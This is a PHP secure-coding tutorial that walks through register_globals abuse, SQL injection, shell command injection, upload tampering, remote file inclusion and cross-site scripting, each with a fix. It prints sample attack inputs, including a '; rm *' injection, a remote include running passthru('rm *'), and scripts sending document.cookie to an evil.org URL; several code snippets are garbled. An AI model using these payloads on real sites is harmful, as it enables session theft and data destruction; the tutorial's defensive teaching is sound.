Programming PHP with Security in Mind

by Nuno Loureiro

From time to time, you will find a security advisory about some major web application on security mailing lists. Most of the time, the problem is fixed easily. The errors often occur because the author had five minutes to do his application while his boss was yelling at him, or was distracted when developing it or simply did not have enough practice in programming secure web applications.

Writing a secure web application is not an easy task, because the real problem is not a matter of knowledge but one of practice. It is a good idea to keep some tips in mind when programming. To help memorize them, you should understand how and why they are so important. Then you can start to change your programming practices in the future. Knowledge of the most common threats and respective modes of attack can go a long way toward increasing security.

This article provides a basis for understanding secure programming with PHP and gives a broader view of the subject. You should keep in mind that these guidelines identify only the most common threats and how to avoid them, reducing the risk of security compromise at the same time.

The basic rule for writing a secure application is: never trust user input. Poorly validated user input constitutes the most severe security vulnerabilities in any web application. In other words, input data should be considered guilty unless proven innocent.

Global Variable Scope

PHP versions prior to 4.2.0 registered by default all kinds of external variables in the global scope. So no variable could be trusted, whether external or internal.

Look at the following example:

<?php
    if (authenticate_user()) {
        $authenticated = true;
    }
    ...

    if (!$authenticated) {
        die("Authorization required");
    }
?>

If you set $authenticated to 1 via GET, like this:

http://example.com/admin.php?authenticated=1
you would pass the last “if” in the previous example.

Thankfully, since version 4.1.0, PHP has deprecated register_globals. This means that GET, POST, Cookie, Server, Environment and Session variables are no longer in the global scope anymore. To help users build PHP applications with register_globals off, several new special arrays exist that are automatically global in any scope. They include $_GET, $_POST, $COOKIE, $_SERVER, $_ENV, $_REQUEST and $_SESSION.

If the directive register_globals is on, do yourself a favor and turn it off. If you turn it off and then validate all the user input, you made a big step toward secure programming. In many cases, a type casting is sufficient validation.

Client-side JavaScript form checks do not make any difference, because an attacker can submit any request, not only one that is available on the form. Here is an example of what this would look like:

<?php
    $_SESSION['authenticated'] = false;
    if (authenticate_user()) {
        $_SESSION['authenticated'] = true;
    }
    ...
    if (!$_SESSION['authenticated']) {
        die("Authorization required");
    }
?>
Database Interactions

Most PHP applications use databases, and they use input from a web form to construct SQL query strings. This type of interaction can be a security problem.

Imagine a PHP script that edits data from some table, with a web form that POSTs to the same script. The beginning of the script checks to see if the form was submitted, and if so, it updates the table the user chose.

<?php
    if ($update_table_submit) {
        $db->query("update $table set name=$name");
    }
?>

If you do not validate the variable $table that came from the web form, and if you do not check to see if the $update_table_submit variable came from the form (via $POST['update_table_submit']), you can set its value via GET to whatever you want. You could do it like this:

http://example.com/edit.php?update_table_submit
=1&table=users+set+password%3Daaa
+where+user%3D%27admin%27+%23
which results in the following SQL query:
update users set password=aaa
  where user="admin" # set name=$name
A simple validation for the $table variable would be to check whether its content is alphabetical only, or if it is only one word (if (count(explode("",$table)) { ... }).
Calling External Programs

Sometimes we need to call external programs (using system(), exec(), popen(), passthru() or the back-tick operator) in our PHP scripts. One of the most dangerous security threats is calling external programs if the program name or its arguments are based on user input. In fact, the PHP manual page for most of these functions includes a note that warns: “If you are going to allow data coming from user input to be passed to this function, then you should be using escapeshellarg() or escapeshellcmd() to make sure that users cannot trick the system into executing arbitrary commands.”

Imagine the following example:

<?php
    $fp = popen('/usr/sbin/sendmail -i '. $to, 'w');
?>

The user can control the content of the variable $to above in the following manner:

http://example.com/send.php?$to=evil%40evil.org+
%3C+%2Fetc%2Fpasswd%3B+rm+%2A
The result of this input would be running this command:
/usr/sbin/sendmail -i evil@evil.org
/etc/passwd; rm *
A simple solution to resolve this security problem is:
<?php
    $fp = popen('/usr/sbin/sendmail -i '.
                escapeshellarg($to), 'w');
?>
Better than that, check whether the content in the $to variable is a valid e-mail address, with a regexp.
File Upload

User-uploaded files also can be problematic because of the way PHP handles them. PHP will define a variable in the global scope that has the same name as the file input tag in the submitted web form. Then, it will create this file with the uploaded file content, but it will not check whether the filename is valid or is the uploaded file.

<?php
    if ($upload_file && $fn_type == 'image/gif' &&
            $fn_size < 100000) {
        copy($fn, 'images/');
        unlink($fn);
    }
?>
<form method="post" name="fileupload"
 action="fupload.php" enctype="multipart/form-data">
File: <input type="file" name="fn">
<input type="submit" name="upload_file"
 value="Upload">

A malicious user could create his own form specifying the name of some other file that contains sensitive information and submit it, resulting in the processing of that other file. For example,

<form method="post" name="fileupload"
 action="fupload.php">
<input type="hidden" name="fn"
 value="/var/www/html/index.php">
<input type="hidden" name="fn_type"
value="text">
<input type="hidden" name="fn_size"
value="22">
<input type="submit" name="upload_file"
 value="Upload">
The above input would result in moving the file /var/www/html/index.php to images/.

A solution for this problem is to use move_uploaded_file() or is_uploaded_file(). However, there are some other problems with user-uploaded files. Imagine that you have a web application that lets users upload images smaller than 100Kb. In this case, even using move_uploaded_file() or is_uploaded_file() would not solve the problem. The attacker still could submit his form specifying the file size, as in the prior example. The solution here is to use the super-global array $_FILES to check user uploaded file information:

<?php
    if ($upload_file &&
        $_FILES['fn']['type'] ==
'image/gif
        $_FILES['fn']['size'] < 100000) {
            move_uploaded_file(
                $_FILES['fn']['tmp_name'],
                'images/');
    }
?>
Include Files

In PHP you can include local or remote files by using include(), include_once(), require() and require_once(). This is a good feature, because it allows you to have separate files for classes, reused code and so on, increasing the maintainability and readability of your code.

The concept of including remote files is dangerous in itself, though, because the remote site could be compromised or the network connection could be spoofed. In either scenario, you are injecting unknown and possibly hostile code directly into your script.

Including files presents some other problems, especially if you include files whose filename or path is based on user input. Imagine a script that includes several HTML files and displays them in the proper layout:

<?php
include($layout);
?>

If someone were to pass the $layout variable through GET, you probably can figure out what the consequences might be:

http://example.com/leftframe.php?layout=/etc/passwd
or
http://example.com/leftframe.php?layout=
http://evil.org/nasty.html
where nasty.html contains a couple lines of code, such as:
<?php
    passthru('rm *');
    passthru('mail
?>
To avoid this possibility, you should validate the variable you use in include(), perhaps with a regexp.
Cross-Site Scripting

Cross-site scripting (CSS) has been receiving a great deal of press attention. A simple search in the BugTraq mail archives retrieved 15 different reports from June 2002 alone, about cross-site scripting vulnerabilities in several applications.

This kind of attack works directly against the users of your site. It does this by tricking the victim into making a specific and carefully crafted HTTP request. This can happen through a link in an HTML e-mail message, in a web-based forum or embedded in a malicious web page. The victim may not know he is making such a request, if the link is embedded into a malicious web page for example, and the attack may not even require user facilitation. That is, when the user's browser receives the page requested, the malicious script is parsed and executed in the security context of the user.

Modern client-side scripting languages also can execute a number of functions that can be dangerous. Although, for example, JavaScript allows only the originating site to access its own private cookies, the attacker can bypass such a restriction by taking advantage of poorly coded scripts.

The common scenario for CSS attacks is when a user is logged in to a web application and has a valid session stored in a session cookie. The attacker constructs a link to the application from an area of the application that doesn't check user input for validity. It essentially processes what the victim requests and returns it.

Here is an example of such a scenario to illustrate my point. Imagine a web-mail application that blindly prints the mail subject in a mailbox list, like this:

<?php
    ...
    echo "<TD> $subject </TD>";
?>

In this case, an attacker could include JavaScript code in an e-mail subject, and it would be executed in the user's browser when he opens the mailbox.

This vulnerability then can be used to steal a user's cookies and allow the attacker to take over the user's session, by including JavaScript code like this:

<script>
self.location.href=
"http://evil.org/cookie-grab.html?cookies="
+escape(document.cookie)
</script>

When the user opens the mailbox, he will be redirected to the URL specified in the JavaScript code, which includes the victim's cookie. The attacker then simply needs to check his web server logs to know the victim's session cookie.

A vulnerability could be fixed by using htmlspecialchars() when printing variables. htmlspecialchars() converts special characters to HTML entities, meaning it will convert the < and > characters from the <script> tag to their respective entities, &lt and &gt. When the victim's browser parses the page, it will not do anything dangerous because &lt;script&gr; means simple text to the browser.

So, a possible solution for this type of attack is:

<?php
    ...
    echo "<TD> ".htmlspecialchars($subject)."
</TD>";
?>

Another common scenario involves printing variables blindly to a hidden input section of a web form:

<input type="hidden" name="page"
 value="<?php echo $page; ?>">
Consider the following URL:
http://example.com/page.php?page=">
<script>self.location.href="http://evil.org/
css-attack.html?cookies="
+escape(document.cookie)</script>
If the attacker can get us to select a link such as this one, it is possible that our browser will be redirected to the attacker's site, as in the previous example. But because the variable $page is integer, you could cast it or use the PHP function intval() to avoid this problem:
<input type="hidden" name="page"
 value="<?php echo intval($page); ?>">
Again, to avoid this kind of attack you always should perform user validation or insure that user-submitted data always is HTML-escaped before displaying it.
Conclusions

I hope these guidelines help you have more secure web applications. The big lessons here are never trust user input, never trust variables that are passed between scripts (as through GET), never trust variables that came from a web form and never trust a variable if is not initialized in your script. If you cannot initialize a variable in your script, be sure to validate it.

Nuno Loureiro is a cofounder of Ethernet, lda (www.eth.pt). He has been programming PHP for over three years and has coordinated several big web applications. He likes climbing and trekking and can be reached at nuno@eth.pt.
Load Disqus comments